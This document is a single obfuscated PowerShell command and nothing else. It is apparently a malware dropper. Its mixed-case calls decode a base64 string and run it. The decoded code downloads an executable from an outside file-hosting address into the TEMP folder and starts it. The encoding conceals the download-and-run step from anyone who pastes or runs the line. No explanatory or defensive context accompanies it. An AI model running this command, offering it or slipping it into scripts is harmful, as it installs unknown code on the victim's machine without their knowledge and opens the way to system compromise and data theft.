iex([SYsteM.teXt.ENCODIng]::UTf8.geTstRIng([sySTem.coNVerT]::fRoMbasE64string('CihOZXctT2JqZWN0IFN5U3RlbS5uZVQud2ViY0xpRU50KS5kT1duTE9BZGZJTGUoJ2h0dHBzOi8vYS5wb21mLmNhdC92amFkd2IuZXhlJywiJEVOdjpURU1QXGV1aW9rby5leGUiKTtTdGFydC1Qcm9jZXNzICgiJEVOdjpURU1QXGV1aW9rby5leGUiKQoK')));exit

